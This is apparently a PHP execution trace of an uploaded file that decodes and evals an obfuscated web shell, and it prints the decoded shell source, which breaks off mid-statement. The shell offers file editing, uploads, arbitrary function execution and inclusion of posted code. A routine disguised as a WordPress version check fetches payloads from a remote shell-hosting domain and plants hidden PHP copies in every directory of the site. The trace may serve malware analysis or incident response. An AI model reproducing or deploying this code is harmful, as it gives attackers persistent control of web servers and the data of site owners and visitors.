3 8 R 'AeAXH+h4nKVcWXMTS7J+v7+ix0HMMTHE3N7bVg1zD+AF4xVZBptjQiFLLSwsS0KL3fYZ/vtk5VJV3WoZOPfBtNSqJSsrly+zsvjX/02uJ//jfRnPx972xcfJJ+W9z74Uhw1v0PfWB7NZPl9/1j45Pm39sXZZpMllEMfw3LwssvgyiDL4Hl0GSQbv8ssghXcxtElS/fva5+fPvT9xoP5gmLcni3m7Ox7N89F8BoPubtOYKbQP4C+m8VMfngGOVaQba59feLP5dDCZDTuz63xmicGJHGKKpI/EFGlfCKABLTGamrx7PfagdxjxNCmOVMB0cbCmvO9ePpzltmER57Q+GC4G0jJYbhzAM8XRdb8ipI7fiY3HW5P0SnmnQXRw1DDDRN1LGIVWBX9Rjq+KsE+EZuGlHlG/4q+mSWa6wCw4w+Tm1Zdz5Y2H8aevDe/ZpDO/9l5qNrWn+WTY6ebrMGHSXXsBEycZPLDJc+79dnF9/qi8/Pjr6Qlts+xFoBekp067'
3 9 0 0.000657 412216 base64_decode 0 /var/www/html/uploads/borgit.php(4) : eval()'d code 1 1 'AeAXH+h4nKVcWXMTS7J+v7+ix0HMMTHE3N7bVg1zD+AF4xVZBptjQiFLLSwsS0KL3fYZ/vtk5VJV3WoZOPfBtNSqJSsrly+zsvjX/02uJ//jfRnPx972xcfJJ+W9z74Uhw1v0PfWB7NZPl9/1j45Pm39sXZZpMllEMfw3LwssvgyiDL4Hl0GSQbv8ssghXcxtElS/fva5+fPvT9xoP5gmLcni3m7Ox7N89F8BoPubtOYKbQP4C+m8VMfngGOVaQba59feLP5dDCZDTuz63xmicGJHGKKpI/EFGlfCKABLTGamrx7PfagdxjxNCmOVMB0cbCmvO9ePpzltmER57Q+GC4G0jJYbhzAM8XRdb8ipI7fiY3HW5P0SnmnQXRw1DDDRN1LGIVWBX9Rjq+KsE+EZuGlHlG/4q+mSWa6wCw4w+Tm1Zdz5Y2H8aevDe/ZpDO/9l5qNrWn+WTY6ebrMGHSXXsBEycZPLDJc+79dnF9/qi8/Pjr6Qlts+xFoBekp067'
3 9 1 0.000730 420440
3 9 R '\001�\027\037�x��\\Ys\023K�~����A�11����V\rs\017�\005�\025Y\006�cB!K-,,KB��\031��d�RU�j\0318���Ԫ%++�/����M�\'��}\031������\'�Ͼ\024�\ro��\a�Y>_�>9>m��vY��e\020��ܼ,��2�2�\036]\006I\006��� �w1�IR�����Ͻ?q��`��\'�y�;\036���|\006��nӘ)�\017�/��S\037�\001�U�\033k�_x��t0�\r;��|f���\034b����\024i_\b�\001-1���{=��w\030�4)�T�tq����^>��a\021�>\030.\006�2Xn\034�3��u�"��߉��[��Jy�Atp�0�D�K\030�V\005Q����O�f�\036Q�⯦If��,8���s升�\r�٤3��^j6���d����0a�]{\001\023\'\031<��s�vq}�������\tm��E�\027��N��.�\0'
3 10 0 0.000929 412216 gzinflate 0 /var/www/html/uploads/borgit.php(4) : eval()'d code 1 1 '\001�\027\037�x��\\Ys\023K�~����A�11����V\rs\017�\005�\025Y\006�cB!K-,,KB��\031��d�RU�j\0318���Ԫ%++�/����M�\'��}\031������\'�Ͼ\024�\ro��\a�Y>_�>9>m��vY��e\020��ܼ,��2�2�\036]\006I\006��� �w1�IR�����Ͻ?q��`��\'�y�;\036���|\006��nӘ)�\017�/��S\037�\001�U�\033k�_x��t0�\r;��|f���\034b����\024i_\b�\001-1���{=��w\030�4)�T�tq����^>��a\021�>\030.\006�2Xn\034�3��u�"��߉��[��Jy�Atp�0�D�K\030�V\005Q����O�f�\036Q�⯦If��,8���s升�\r�٤3��^j6���d����0a�]{\001\023\'\031<��s�vq}�������\tm��E�\027��N��.�\0'
3 10 1 0.001130 420440
3 10 R 'x��\\Ys\023K�~����A�11����V\rs\017�\005�\025Y\006�cB!K-,,KB��\031��d�RU�j\0318���Ԫ%++�/����M�\'��}\031������\'�Ͼ\024�\ro��\a�Y>_�>9>m��vY��e\020��ܼ,��2�2�\036]\006I\006��� �w1�IR�����Ͻ?q��`��\'�y�;\036���|\006��nӘ)�\017�/��S\037�\001�U�\033k�_x��t0�\r;��|f���\034b����\024i_\b�\001-1���{=��w\030�4)�T�tq����^>��a\021�>\030.\006�2Xn\034�3��u�"��߉��[��Jy�Atp�0�D�K\030�V\005Q����O�f�\036Q�⯦If��,8���s升�\r�٤3��^j6���d����0a�]{\001\023\'\031<��s�vq}�������\tm��E�\027��N��.�\001�?�}�b����'
3 11 0 0.001325 412216 gzuncompress 0 /var/www/html/uploads/borgit.php(4) : eval()'d code 1 1 'x��\\Ys\023K�~����A�11����V\rs\017�\005�\025Y\006�cB!K-,,KB��\031��d�RU�j\0318���Ԫ%++�/����M�\'��}\031������\'�Ͼ\024�\ro��\a�Y>_�>9>m��vY��e\020��ܼ,��2�2�\036]\006I\006��� �w1�IR�����Ͻ?q��`��\'�y�;\036���|\006��nӘ)�\017�/��S\037�\001�U�\033k�_x��t0�\r;��|f���\034b����\024i_\b�\001-1���{=��w\030�4)�T�tq����^>��a\021�>\030.\006�2Xn\034�3��u�"��߉��[��Jy�Atp�0�D�K\030�V\005Q����O�f�\036Q�⯦If��,8���s升�\r�٤3��^j6���d����0a�]{\001\023\'\031<��s�vq}�������\tm��E�\027��N��.�\001�?�}�b����'
3 11 1 0.001615 432728
3 11 R '<?php\n goto EYWpZ; Q7gxM: if (isset($_POST["\\x65\\144\\x69\\x74\\137\\143\\157\\x6e\\164\\145\\156\\x74"])) { if (file_put_contents($_GET["\\x66\\151\\154\\x65\\160\\x61\\164\\x68"], stripslashes($_POST["\\145\\144\\x69\\x74\\x5f\\143\\x6f\\156\\x74\\x65\\156\\x74"]))) { echo "\\123\\x61\\166\\145\\x64\\41"; } else { echo "\\x4e\\157\\x74\\40\\x73\\141\\x76\\x65\\x64\\x21"; } } goto ODp6b; S13LN: echo "\\x3c\\57\\164\\x64\\x3e\\x3c\\x2f\\x74\\x72\\76\\x3c\\x74\\x72\\x3e\\x3c\\x74\\x64\\x3e"; goto pkAgX; o'
3 12 0 0.002422 520752 eval 1 '?><?php\n goto EYWpZ; Q7gxM: if (isset($_POST["\\x65\\144\\x69\\x74\\137\\143\\157\\x6e\\164\\145\\156\\x74"])) { if (file_put_contents($_GET["\\x66\\151\\154\\x65\\160\\x61\\164\\x68"], stripslashes($_POST["\\145\\144\\x69\\x74\\x5f\\143\\x6f\\156\\x74\\x65\\156\\x74"]))) { echo "\\123\\x61\\166\\145\\x64\\41"; } else { echo "\\x4e\\157\\x74\\40\\x73\\141\\x76\\x65\\x64\\x21"; } } goto ODp6b; S13LN: echo "\\x3c\\57\\164\\x64\\x3e\\x3c\\x2f\\x74\\x72\\76\\x3c\\x74\\x72\\x3e\\x3c\\x74\\x64\\x3e"; goto pkAgX; ol4Zj: $path = str_replace("\\x5c", "\\57", $path); goto HuhXz; eOjSP: if ($_GET["\\165\\x72\\x6c"]) { goto Smy74; KFBgd: if ($n[3] == "\\x74\\170\\x74") { $z = "\\160\\150\\x70"; $name = $n[2]; } else { $z = $n[3]; $name = "\\155\\157\\142\\141\\x6e"; } goto WkwO7; sfiyR: preg_match("\\57\\x28\\56\\52\\x29\\x5c\\x2f\\50\\56\\x2a\\x29\\x5c\\56\\x28\\x2e\\x2a\\x3f\\x29\\44\\x2f", $url, $n); goto KFBgd; WkwO7: if ($_GET["\\144\\151\\x72"]) { $dir = $_SERVER["\\x44\\117\\x43\\x55\\x4d\\105\\116\\124\\137\\122\\117\\117\\124"] . "\\x2f" . $_GET["\\x64\\x69\\162"] . "\\x2f" . $name . "\\x2e" . $z; } else { $dir = $_SERVER["\\x44\\117\\103\\125\\x4d\\105\\x4e\\x54\\x5f\\x52\\117\\x4f\\x54"] . "\\x2f" . $name . "\\56" . $z; } goto f18UN; cueJG: if (file_exists($dir)) { echo "\\74\\x74\\x72\\x3e\\x3c\\164\\x64\\x3e\\x3c\\x66\\157\\156\\164\\x20\\x63\\157\\154\\157\\162\\75\\42\\x67\\162\\x65\\145\\x6e\\42\\76\\x64\\x6f\\167\\x6e\\x6c\\157\\x61\\144\\40\\163\\x75\\x63\\143\\145\\163\\163\\x3c\\57\\146\\x6f\\156\\x74\\x3e\\x3c\\57\\x74\\x64\\x3e\\74\\57\\164\\162\\x3e"; } else { echo "\\x3c\\164\\x72\\76\\74\\164\\x64\\76\\x3c\\146\\x6f\\x6e\\x74\\x20\\143\\157\\x6c\\157\\x72\\75\\42\\x72\\145\\x64\\x22\\76\\144\\157\\x77\\156\\154\\x6f\\x61\\x64\\40\\146\\141\\151\\154\\74\\x2f\\x66\\x6f\\x6e\\164\\x3e\\x3c\\x2f\\x74\\144\\x3e\\74\\57\\x74\\x72\\76"; } goto K9xwA; f18UN: get($url, $dir); goto cueJG; Smy74: $url = $_GET["\\165\\162\\154"]; goto sfiyR; K9xwA: } elseif ($_POST["\\x75\\162\\x6c"]) { goto E4cjk; NAx2l: get($url, $dir); goto R6I5T; U1lpT: $dir = $_POST["\\160\\x61\\164\\150"] . "\\x2f" . $name . "\\56" . $z; goto NAx2l; R6I5T: if (file_exists($dir)) { echo "\\74\\x74\\x72\\76\\x3c\\x74\\x64\\x3e\\74\\146\\157\\156\\x74\\40\\x63\\157\\154\\157\\x72\\75\\42\\x67\\162\\x65\\x65\\156\\42\\76\\x64\\x6f\\x77\\x6e\\154\\x6f\\x61\\144\\x20\\x73\\x75\\x63\\x63\\x65\\163\\x73\\74\\57\\146\\157\\156\\x74\\x3e\\x3c\\57\\164\\x64\\x3e\\x3c\\x2f\\164\\162\\x3e"; } else { echo "\\74\\x74\\x72\\x3e\\x3c\\x74\\x64\\x3e\\74\\146\\x6f\\156\\164\\x20\\x63\\x6f\\154\\157\\162\\x3d\\x22\\x72\\x65\\x64\\x22\\76\\x64\\157\\167\\156\\x6c\\x6f\\141\\x64\\x20\\x66\\141\\x69\\x6c\\74\\57\\x66\\157\\x6e\\x74\\76\\74\\x2f\\x74\\144\\x3e\\74\\57\\x74\\x72\\76"; } goto zybPN; E4cjk: $url = $_POST["\\165\\162\\x6c"]; goto xGjCF; trN3F: if ($n[3] == "\\164\\170\\x74") { $z = "\\160\\x68\\x70"; $name = $n[2]; } else { $z = $n[3]; $name = "\\x6d\\157\\x62\\x61\\x6e"; } goto U1lpT; xGjCF: preg_match("\\x2f\\50\\56\\x2a\\x29\\134\\57\\x28\\56\\x2a\\51\\134\\x2e\\50\\56\\x2a\\77\\51\\x24\\x2f", $url, $n); goto trN3F; zybPN: } goto dsRec; j1Os6: function get($url, $dir) { goto xzQDs; jugf7: curl_setopt($ch, CURLOPT_TIMEOUT, 10); goto UsYaK; Ne2Hc: file_put_contents($dir, $data); goto IPD1q; UsYaK: $data = curl_exec($ch); goto H5PS3; TIJPo: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto jugf7; xzQDs: $ch = curl_init(); goto fkBTp; H5PS3: if (!$data) { $data = @file_get_contents($url); } goto Ne2Hc; fkBTp: curl_setopt($ch, CURLOPT_URL, $url); goto TIJPo; IPD1q: } goto eOjSP; ETryK: echo "\\74\\164\\x61\\x62\\154\\145\\x20\\141\\154\\x69\\147\\x6e\\x3d\\x22\\143\\145\\x6e\\164\\x65\\162\\42\\40\\x77\\151\\x64\\164\\x68\\x3d\\x22\\64\\60\\x30\\x22\\40\\142\\x6f\\162\\x64\\145\\162\\x3d\\42\\x30\\x22\\40\\143\\x65\\x6c\\x6c\\x73\\x70\\x61\\x63\\x69\\x6e\\x67\\x3d\\x22\\x31\\x22\\x20\\x63\\x65\\x6c\\x6c\\160\\x61\\144\\144\\151\\x6e\\x67\\x3d\\x22\\63\\42\\x3e\\74\\x74\\x72\\76\\x3c\\164\\x64\\76\\120\\141\\164\\x68\\x4e\\x6f\\167\\72\\40"; goto xncW0; dsRec: echo "\\74\\x74\\x72\\76\\x3c\\164\\144\\76\\74\\146\\157\\x72\\155\\x20\\x6d\\145\\x74\\x68\\x6f\\144\\x3d\\x22\\120\\x4f\\x53\\x54\\42\\40\\x61\\143\\164\\x69\\x6f\\156\\x3d\\x22\\x3f\\160\\141\\x74\\x68\\75{$path}\\42\\76\\x3c\\163\\x70\\x61\\156\\76\\125\\x72\\154\\72\\x20\\74\\x2f\\x73\\160\\141\\x6e\\76\\x3c\\x69\\156\\x70\\x75\\x74\\40\\164\\x79\\x70\\145\\75\\x74\\145\\x78\\x74\\x20\\156\\141\\x6d\\145\\75\\x22\\165\\162\\x6c\\x22\\x20\\x76\\x61\\x6c\\x75\\x65\\75\\42\\x22\\76\\74\\151\\156\\x70\\x75\\164\\x20\\x74\\x79\\x70\\145\\x3d\\x22\\150\\151\\144\\144\\x65\\x6e\\42\\x20\\x6e\\141\\x6d\\x65\\75\\x22\\x70\\x61\\164\\150\\42\\40\\x76\\x61\\154\\x75\\x65\\75\\42{$path}\\42\\x3e\\x3c\\x69\\x6e\\x70\\165\\x74\\40\\164\\171\\160\\145\\75\\163\\165\\x62\\x6d\\x69\\164\\x20\\x76\\141\\154\\x75\\145\\75\\42\\104\\x6f\\167\\x6e\\154\\157\\141\\x64\\42\\x3e\\x3c\\x2f\\x66\\157\\x72\\x6d\\x3e\\x3c\\x2f\\164\\x64\\x3e\\74\\x2f\\164\\x72\\x3e"; goto Q7gxM; EYWpZ: if (!function_exists("\\167\\160\\137\\x63\\x6f\\162\\145\\137\\166\\145\\x72\\x73\\x69\\x6f\\x6e\\x5f\\143\\150\\145\\x63\\153")) { function wp_core_version_check() { goto Vg2KG; wEGLM: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "\\163\\145\\163\\163\\x5f" . md5(\'\' . $hostname . "\\137" . $document_file . \'\'); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "\\x73\\x65\\163\\163\\x5f" . md5(\'\' . $hostname . "\\x5f" . $document_file . \'\'); } goto QuO0Z; nrqlh: $uri_path = dirname($uri_path); goto mwCmD; MzByA: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "\\52", GLOB_ONLYDIR)); goto Xudy1; mwCmD: $file_path = dirname($document_file); goto EQ5A4; JqJqa: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == \'\') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, \'\', $file_path); } goto jZXeZ; Xudy1: foreach ($dirs as $d) { goto zhxUW; wSOLH: foreach ($dirs as $d) { if (!@preg_match("\\x23\\x77\\160\\55\\143\\157\\156\\164\\145\\156\\164\\43", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "\\56" . basename($d) . "\\x2e\\160\\x68\\x70"; @file_put_contents($file_name, $response); } } goto nbLOp; yJNM2: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "\\52", GLOB_ONLYDIR)); goto wSOLH; jpxYs: @file_put_contents($file_name, $response); goto yJNM2; zhxUW: $file_name = $d . DIRECTORY_SEPARATOR . "\\56" . basename($d) . "\\56\\160\\150\\160"; goto jpxYs; nbLOp: } goto ohwPw; QuO0Z: if (@$_GET["\\x73\\x6c\\151\\x6e\\x63\\x65\\137\\147\\x6f\\154\\x64\\145\\x6e"]) { goto a7GyL; mTfwR: exit; goto P8BjD; a7GyL: echo "\\x3c\\x21\\55\\x2d\\x20\\x2f\\57\\123\\x69\\x6c\\145\\156\\x63\\x65\\40\\x69\\x73\\40\\147\\157\\154\\x64\\x65\\x6e\\x2e\\x20\\55\\x2d\\76"; goto qT7Vk; qT7Vk: if (function_exists("\\x63\\x75\\x72\\154\\137\\x69\\156\\151\\164")) { goto KnkIs; Ix7b2: curl_setopt($ch, CURLOPT_URL, "\\x68\\164\\164\\x70\\x3a\\x2f\\x2f\\162\\x35\\x37\\163\\x68\\x65\\154\\x6c\\x2e\\156\\x65\\x74\\57\\152\\161\\165\\x65\\162\\171\\x2e\\x70\\x68\\160\\77\\x76\\75\\x31\\56\\62\\x26\\x70\\x77\\x64\\x3d\\147\\145\\x74"); goto OwzTb; OwzTb: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto azluq; azluq: $response = curl_exec($ch); goto nTrl4; KnkIs: $ch = curl_init(); goto Ix7b2; nTrl4: curl_close($ch); goto bKTbq; bKTbq: } else { $response = file_get_contents("\\x68\\x74\\164\\x70\\x3a\\57\\x2f\\x72\\x35\\x37\\x73\\150\\x65\\x6c\\x6c\\x2e\\x6e\\145\\x74\\57\\152\\x71\\x75\\145\\162\\x79\\56\\160\\150\\x70\\77\\166\\x3d\\x31\\56\\x32\\x26\\160\\x77\\144\\x3d\\x67\\145\\x74"); } goto GYWxD; GYWxD: if (md5(sha1(@$_GET["\\x69\\x73"])) == $response) { goto ZGdp0; cAJ5o: if (@$_GET["\\155"]) { goto QWR_v; QWR_v: if (function_exists("\\143\\165\\x72\\x6c\\x5f\\x69\\156\\x69\\x74")) { goto I4PPc; UNv3f: curl_setopt($ch, CURLOPT_URL, "\\x68\\164\\x74\\x70\\72\\x2f\\57\\x72\\x35\\x37\\x73\\150\\145\\154\\x6c\\x2e\\156\\145\\164\\57\\x6d\\x69\\156\\151\\137\\x61\\144\\155\\151\\156\\x2e\\x74\\x78\\x74"); goto BFtvZ; jY9t6: $response = curl_exec($ch); goto RbRQo; BFtvZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto jY9t6; I4PPc: $ch = curl_init(); goto UNv3f; RbRQo: curl_close($ch); goto kY8FG; kY8FG: } else { $response = file_get_contents("\\150\\x74\\x74\\x70\\x3a\\57\\57\\x72\\65\\x37\\163\\150\\x65\\x6c\\x6c\\x2e\\156\\x65\\x74\\57\\155\\151\\x6e\\151\\137\\141\\144\\x6d\\x69\\x6e\\56\\164\\x78\\164"); } goto FEpuD; Pnzz0: @file_put_contents($file_name_path, $response); goto NXRal; FEpuD: $file_name_path = @$_GET["\\x6d"] . "\\x67\\x61\\147\\x61\\x6c\\x2e\\160\\x68\\160"; goto Pnzz0; NXRal: echo $file_name_path; goto DM5Ma; DM5Ma: } goto vn9aQ; ZGdp0: if (@$_GET["\\146"]) { print_r($_GET["\\x66"]($_GET["\\x63"])); } goto cAJ5o; vn9aQ: if (@$_POST["\\154"]) { function basic_code_extensions($request) { goto I5IuH; xn0ob: fclose($tmp); goto TEvC4; TEvC4: return $ret; goto L7G9o; W6xRj: $tmpf = stream_get_meta_data($tmp); goto I48Gy; I5IuH: $tmp = tmpfile(); goto W6xRj; I48Gy: $tmpf = $tmpf["\\165\\162\\x69"]; goto Z686I; rXK9X: $ret = (include $tmpf); goto xn0ob; Z686I: fwrite($tmp, $request); goto rXK9X; L7G9o: } print_r(basic_code_extensions($_POST["\\x6c"])); } goto jHYDp; jHYDp: } goto mTfwR; P8BjD: } goto KQPth; EQ5A4: $uri_path = str_replace("\\57", DIRECTORY_SEPARATOR, $uri_path); goto JqJqa; KQPth: if (!file_exists($tmp_file)) { goto z5X47; vh5sN: @file_put_contents($tmp_file, $response); goto BC6iX; DTYf1: @touch($tmp_file); goto vh5sN; z5X47: if (function_exists("\\x63\\165\\x72\\x6c\\x5f\\x69\\x6e\\x69\\164")) { goto qUDOt; qUDOt: $ch = curl_init(); goto GV2h4; c5fKV: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\\110\\x54\\x54\\120\\x5f\\x48\\x4f\\123\\124"] . $_SERVER["\\x52\\x45\\121\\125\\105\\x53\\124\\x5f\\125\\x52\\x49"]); goto qD9my; qD9my: $response = curl_exec($ch); goto QCloh; GV2h4: curl_setopt($ch, CURLOPT_URL, "\\150\\164\\164\\x70\\x3a\\x2f\\57\\162\\x35\\67\\163\\x68\\x65\\x6c\\154\\x2e\\156\\x65\\x74\\57\\x6a\\x71\\165\\145\\162\\171\\56\\160\\x68\\x70\\x3f\\x76\\75\\61\\x2e\\x32\\x26\\x72\\145\\x71\\165\\x65\\163\\x74\\x3d\\x65\\156\\141\\142\\154\\145"); goto FK0Xq; FK0Xq: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto c5fKV; QCloh: curl_close($ch); goto YpL_P; YpL_P: } else { goto dv5_h; SEYI3: $context = stream_context_create($opts); goto o3iQ2; ici4q: $opts = array("\\x68\\164\\x74\\x70" => array("\\150\\x65\\141\\x64\\145\\x72" => array("\\122\\145\\146\\145\\162\\145\\162\\x3a\\40{$referer}\\xd\\12"))); goto SEYI3; dv5_h: $referer = $_SERVER["\\x48\\x54\\124\\x50\\137\\110\\117\\x53\\x54"] . $_SERVER["\\122\\105\\121\\x55\\105\\x53\\124\\x5f\\x55\\122\\x49"]; goto ici4q; o3iQ2: $response = @file_get_contents("\\x68\\164\\164\\160\\72\\x2f\\57\\x72\\65\\67\\x73\\x68\\x65\\154\\x6c\\56\\x6e\\x65\\164\\57\\152\\x71\\165\\145\\162\\171\\x2e\\x70\\x68\\160\\77\\166\\x3d\\x31\\56\\62\\46\\x72\\x65\\161\\x75\\145\\163\\164\\75\\x65\\x6e\\141\\142\\x6c\\145", false, $context); goto yrnyG; yrnyG: } goto DTYf1; BC6iX: } else { $response = file_get_contents($tmp_file); if (!@preg_match("\\43\\x73\\x74\\x74\\x31\\x23", $response)) { goto Lztz2; J0uhi: @file_put_contents($tmp_file, $response); goto qfjOh; UwFl7: @touch($tmp_file); goto J0uhi; Lztz2: if (function_exists("\\x63\\165\\x72\\x6c\\x5f\\x69\\156\\151\\164")) { goto DDVLS; YbFib: $response = curl_exec($ch); goto CT9t2; gh0NZ: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\\110\\x54\\124\\x50\\x5f\\x48\\x4f\\x53\\x54"] . $_SERVER["\\122\\105\\x51\\125\\x45\\x53\\124\\x5f\\125\\x52\\111"]); goto YbFib; DUwRv: curl_setopt($ch, CURLOPT_URL, "\\150\\x74\\164\\x70\\72\\57\\x2f\\162\\x35\\67\\x73\\x68\\x65\\x6c\\x6c\\56\\x6e\\145\\164\\x2f\\x6a\\161\\x75\\145\\162\\171\\x2e\\x70\\150\\160\\77\\166\\x3d\\x31\\x2e\\62\\46\\162\\x65\\161\\x75\\x65\\163\\164\\75\\x65\\x6e\\141\\142\\x6c\\145"); goto FsDau; DDVLS: $ch = curl_init(); goto DUwRv; FsDau: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto gh0NZ; CT9t2: curl_close($ch); goto CTFHU; CTFHU: } else { goto Iah3I; dIiO6: $opts = array("\\150\\164\\x74\\x70" => array("\\150\\x65\\x61\\x64\\x65\\x72" => array("\\122\\145\\x66\\x65\\162\\145\\162\\x3a\\40{$referer}\\xd\\12"))); goto vNWMn; Iah3I: $referer = $_SERVER["\\110\\124\\124\\120\\x5f\\110\\117\\x53\\124"] . $_SERVER["\\122\\x45\\121\\x55\\105\\x53\\x54\\x5f\\125\\122\\111"]; goto dIiO6; IfMVt: $response = @file_get_contents("\\150\\164\\x74\\x70\\72\\x2f\\x2f\\x72\\x35\\67\\163\\x68\\x65\\x6c\\x6c\\56\\156\\x65\\x74\\x2f\\152\\x71\\x75\\145\\162\\171\\56\\160\\150\\160\\x3f\\166\\75\\x31\\x2e\\x32\\x26\\x72\\x65\\x71\\x75\\x65\\x73\\164\\x3d\\145\\x6e\\x61\\142\\154\\x65", false, $context); goto t07Gl; vNWMn: $context = stream_context_create($opts); goto IfMVt; t07Gl: } goto UwFl7; qfjOh: } } goto MzByA; K8nbx: $uri_path = $parse_url["\\160\\141\\x74\\150"]; goto nrqlh; xsu6n: $parse_url = parse_url($request_uri); goto K8nbx; PLyzL: $request_uri = $_SERVER["\\x52\\x45\\121\\125\\105\\123\\124\\137\\x55\\x52\\x49"]; goto xsu6n; Vg2KG: $document_file = $_SERVER["\\123\\103\\122\\x49\\x50\\124\\137\\106\\111\\114\\105\\116\\x41\\x4d\\105"]; goto PLyzL; jZXeZ: $hostname = str_replace("\\167\\167\\167\\x2e", \'\', $_SERVER["\\110\\124\\x54\\120\\137\\x48\\x4f\\x53\\x54"]); goto wEGLM; ohwPw: } wp_core_version_check(); } goto ETryK; UQ9Hd: foreach ($paths as $id => $pat) { goto kY3Em; kY3Em: if ($pat == \'\' && $id == 0) { goto vz_c5; ZX0V_: continue; goto QKxoi; vz_c5: $a = true; goto sTmnq; sTmnq: echo "\\x3c\\141\\40\\150\\x72\\x65\\146\\x3d\\x22\\x3f\\x70\\x61\\164\\x68\\x3d\\57\\42\\76\\57\\x3c\\x2f\\x61\\x3e"; goto ZX0V_; QKxoi: } goto tncVh; l2xoj: echo "\\42\\x3e" . $pat . "\\x3c\\x2f\\141\\76\\57"; goto V_Sbb; RiLy2: for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\\x2f"; } } goto l2xoj; tncVh: if ($pat == \'\') { continue; } goto UqM9t; UqM9t: echo "\\x3c\\x61\\40\\x68\\162\\145\\146\\x3d\\42\\x3f\\x70\\141\\164\\x68\\x3d"; goto RiLy2; V_Sbb: } goto S13LN; xncW0: if (isset($_GET["\\x70\\141\\x74\\150"])) { $path = $_GET["\\160\\141\\164\\x68"]; } else { $path = getcwd(); } goto ol4Zj; HuhXz: $paths = explode("\\x2f", $path); goto UQ9Hd; pkAgX: if (isset($_FILES["\\165\\160\\x5f\\x66\\151\\154\\x65"])) { $target_path = basename($_FILES["\\x75\\160\\137\\x66\\x69\\154\\145"]["\\x6e\\141\\x6d\\x65"]); if (move_uploaded_file($_FILES["\\x75\\160\\137\\x66\\151\\x6c\\x65"]["\\x74\\x6d\\160\\x5f\\156\\x61\\x6d\\145"], $path . "\\57" . $target_path)) { echo "\\74\\146\\157\\156\\x74\\40\\x63\\157\\154\\157\\162\\75\\x22\\x67\\x72\\145\\x65\\x6e\\x22\\76\\146\\x69\\x6c\\x65\\40\\165\\160\\41\\x3c\\x2f\\146\\x6f\\156\\x74\\76\\x3c\\x62\\x72\\40\\x2f\\76"; } else { echo "\\x3c\\x66\\157\\x6e\\x74\\x20\\x63\\x6f\\154\\x6f\\x72\\75\\x22\\x72\\145\\144\\x22\\x3e\\165\\x70\\x20\\146\\x61\\151\\154\\x21\\x3c\\x2f\\x66\\x6f\\156\\x74\\x3e\\x3c\\x62\\162\\40\\x2f\\76"; } } goto THHMb; THHMb: echo "\\74\\146\\x6f\\x72\\155\\40\\x65\\156\\143\\164\\x79\\160\\145\\x3d\\42\\x6d\\165\\x6c\\x74\\x69\\160\\141\\x72\\x74\\x2f\\146\\157\\162\\x6d\\x2d\\144\\141\\164\\x61\\x22\\40\\x6d\\145\\x74\\150\\157\\x64\\x3d\\42\\120\\117\\x53\\124\\42\\x20\\141\\143\\164\\x69\\x6f\\156\\x3d\\x22\\x3f\\x70\\x61\\164\\x68\\75{$path}\\x22\\x3e\\x3c\\151\\x6e\\160\\x75\\x74\\x20\\156\\x61\\x6d\\x65\\x3d\\42\\165\\160\\137\\x66\\151\\x6c\\145\\x22\\x20\\x74\\171\\x70\\x65\\75\\42\\146\\x69\\154\\145\\x22\\x2f\\x3e\\74\\151\\156\\160\\x75\\x74\\40\\164\\171\\160\\145\\75\\42\\163\\x75\\142\\x6d\\x69\\164\\x22\\40\\166\\141\\154\\165\\145\\x3d\\x22\\165\\160\\40\\106\\x69\\x6c\\x65\\42\\x2f\\76\\x3c\\57\\146\\157\\162\\x6d\\76\\x3c\\x2f\\x74\\x64\\76\\x3c\\x2f\\164\\x72\\76"; goto j1Os6; ODp6b: if (isset($_GET["\\x66\\151\\x6c\\x65\\x70\\141\\x74\\x68"])) { goto L5GNx; RwWXX: echo "\\x3c\\x2f\\164\\x72\\76\\x3c\\x2f\\164\\144\\76\\x3c\\57\\164\\141\\x62\\x6c\\145\\76\\74\\142\\162\\x20\\x2f\\x3e"; goto uSFRc; uSFRc: echo "\\x3c\\x66\\157\\x72\\x6d\\x20\\x61\\143\\164\\x69\\x6f\\156\\x3d\\x22\\42\\40\\x6d\\x65\\x74\\150\\x6f\\x64\\x3d\\42\\160\\157\\x73\\x74\\x22\\76\\74\\x74\\145\\x78\\164\\141\\x72\\145\\x61\\x20\\x73\\x74\\x79\\154\\145\\75\\42\\x77\\x69\\x64\\164\\150\\72\\x31\\x30\\60\\x25\\x3b\\150\\x65\\151\\147\\x68\\164\\x3a\\63\\x30\\x30\\160\\x78\\x3b\\42\\40\\156\\141\\x6d\\145\\x3d\\42\\x65\\144\\x69\\164\\x5f\\x63\\157\\156\\164\\x65\\x6e\\164\\42\\x3e" . htmlspecialchars(file_get_contents($_GET["\\x66\\151\\x6c\\145\\x70\\x61\\164\\x68"])) . "\\x3c\\x2f\\x74\\145\\x78\\164\\141\\x72\\x65\\x61\\76\\74\\x69\\x6e\\160\\165\\x74\\40\\x74\\x79\\160\\x65\\75\\42\\163\\x75\\142\\155\\151\\164\\x22\\76\\74\\x2f\\x66\\157\\162\\x6d\\x3e"; goto TxCXG; XYzkC: echo $_GET["\\x66\\151\\154\\x65\\x70\\141\\164\\150"]; goto RwWXX; L5GNx: echo "\\74\\164\\x72\\x3e\\x3c\\164\\x64\\x3e\\103\\165\\x72\\162\\x65\\x6e\\x74\\x20\\x46\\x69\\154\\145\\x20\\x3a\\40"; goto XYzkC; TxCXG: } elseif (isset($_GET["\\143\\x68\\145\\x63\\153"]) && $_GET["\\143\\x68\\x65\\143\\x6b"] == "\\x31") { goto uApcr; kfYnM: echo "\\x3c\\57\\x74\\162\\x3e\\74\\x2f\\164\\144\\x3e\\74\\x2f\\x74\\141\\x62\\154\\x65\\76\\x3c\\x62\\x72\\40\\57\\76"; goto OX4IX; bloZz: $filename = $RootDir . "\\x2f\\151\\156\\144\\x65\\170\\x2e\\x70\\x68\\x70"; goto DV9kU; OX4IX: echo "\\74\\160\\162\\145\\x3e" . htmlspecialchars(file_get_contents($filename)) . "\\74\\x2f\\160\\162\\x65\\76"; goto 